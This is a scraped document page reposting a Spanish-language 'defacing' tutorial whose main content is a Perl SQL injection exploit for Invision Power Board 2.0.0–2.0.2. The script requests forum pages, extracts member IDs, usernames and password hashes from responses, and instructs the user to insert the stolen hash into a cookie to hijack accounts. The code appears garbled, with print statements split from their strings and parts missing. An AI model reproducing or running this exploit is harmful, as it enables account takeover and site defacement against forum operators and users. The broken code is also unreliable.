Professional Documents
Culture Documents
########
#####
#
#
#
##
#
#
## #
#
#
#
#####
#
# #
# # ## #
##### #
# #
# #
# #
# #### #
# #####
#### #
#
####
# #
###
#
####
#
#
##
###
##### #
####
#
####
################################################################################
########
* Defacing 8 - Invision Power Board V2.0.0 - 2.0.2 SQL Inyection
* www.digital-system.org - csuser.x[at]gmail[dot]com
################################################################################
########
----------COMIENZO----------
#!/usr/bin/perl
use IO::Socket;
## Invision Power Board v2.0.0 - 2.0.2 sql injection exploit
## by RusH security team (www.rst.void.ru)
## coded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example:
##
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3
## ----------------------------------------------------------------------------------------------## [>] SERVER: 127.0.0.1
## [>] DIR: /IPB202/
## [>] FORUM: 2
## [>] TOPIC: 1
## [>] SID: 3edb1eaeea640d297ee3b1f78b5679b3
## [>] PREFIX:
## [>] ID:
## ----------------------------------------------------------------------------------------------##
print
print
print
print
print
print
print
"[+] CONNECTED\r\n";
"[~] SENDING QUERY...\r\n";
$socket "GET $path HTTP/1.1\r\n";
$socket "Host: $server\r\n";
$socket "Accept: */*\r\n";
$socket "Connection: close\r\n\r\n";
"[+] DONE!\r\n\r\n";
$suc =0;
if ($get_table == 1)
{
while ($answer = <$socket>)
{
if ($answer =~ /(mySQL query error: )(.*)( FROM )(.*)(posts)/){ print "PREFIX: $
4\r\n";
$suc = 1; }
}
if (!$suc) { print "Exploit failed\r\n"; }
exit();
}
print "--[ REPORT ]--------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~ /^([^:]*):([^:]*):([a-z,0-9]{32})$/) { print "MEMBER_ID: [$1] NAM
E: [$2]
PASS_HASH: [$3]\r\n"; $suc = 1; }
}
print "-----------------------------------------------------------------------------------------------\r\n";
if ($suc == 1) { print "Now you need edit cookie and insert new pass_hash and
member_id values.\r\n";
exit(); }
else { print "Exploit failed\r\n"; }
----------FIN----------
################################################################################
########
* Texto recopilado de la Red. [Editado por Digital SYstem]
* www.digital-system.org - csuser.x[at]gmail[dot]com
################################################################################
########